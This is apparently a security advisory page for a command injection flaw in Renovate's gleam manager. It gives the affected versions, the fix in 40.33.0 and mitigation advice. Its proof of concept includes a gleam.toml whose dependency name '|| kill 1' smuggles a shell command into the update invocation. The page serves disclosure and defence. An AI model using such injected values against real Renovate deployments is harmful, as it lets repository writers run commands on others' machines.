Renovate vulnerable to arbitrary command injection via gleam manager and malicious gleam.toml fileGHSA-xjr7-3c3g-m763
MEDIUMGHSA-xjr7-3c3g-m763 is a medium-severity (CVSS 6.7) CWE-77 vulnerability in renovate. A fix is available for renovate — see the affected versions and patch details below.
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- A successful exploit gives an attacker total control of the affected component, not partial access.
Exploitation and automatability from CISA’s SSVC triage for GHSA-xjr7-3c3g-m763.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
renovatenpmDescription
Summary
The user-provided string depName in the gleam manager is appended to the gleam deps update command without proper sanitization.
Details
Adversaries can provide a maliciously crafted gleam.toml in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.
All values added to the packagesToUpdate variable in lib/modules/manager/gleam/artifacts.ts are not being escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 39.53.0 (https://github.com/renovatebot/renovate/commit/d29698e0131231652970f02765312769975e4d38), released on December 6 of 2024.
PoC
- Create a git repo with the following content:
renovate.json5:
{
$schema: "https://docs.renovatebot.com/renovate-schema.json",
customDatasources: {
always: {
defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
},
},
packageRules: [
{
// Target of the day
matchManagers: ["gleam"],
// Trick the manager in believing there's a new version
overrideDatasource: "custom.always",
},
],
}
gleam.toml:
name = "renovate-aci-2"
version = "0.0.1"
[dependencies]
"|| kill 1" = "0.1.0"
manifest.toml:
non-empty file
- Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of
kill 1, terminating the root process of the container.
Impact
This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | renovate | ≥ 39.53.0&&< 40.33.0 | 40.33.0npm install renovate@40.33.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for renovate, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update renovate to 40.33.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-xjr7-3c3g-m763 is resolved across your whole dependency graph.
Workarounds
Stop passing untrusted input into the interpreter or shell: call the affected binary with an argument array rather than a composed command string, reject anything outside a strict allowlist of expected values, and run the component under an account that cannot reach beyond the work it legitimately does.
Fixing This On Your OS
If you run this on a Linux distribution, patch through your package manager against the distro's own security advisory below — it tracks the exact backported fix for your release, which can ship on a different timeline (and sometimes a different severity) than the upstream project.
This Important vulnerability in Renovate allows for arbitrary command execution on the system running Renovate. Exploitation requires an attacker to possess repository write access and introduce a specially crafted `gleam.toml` file. While requiring local access and specific repository control, successful exploitation…
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.Source: Red Hat security advisory for GHSA-xjr7-3c3g-m763 (CC BY 4.0)
Frequently Asked Questions
Is GHSA-xjr7-3c3g-m763 in your dependencies?
Find it across npm, including transitive dependencies.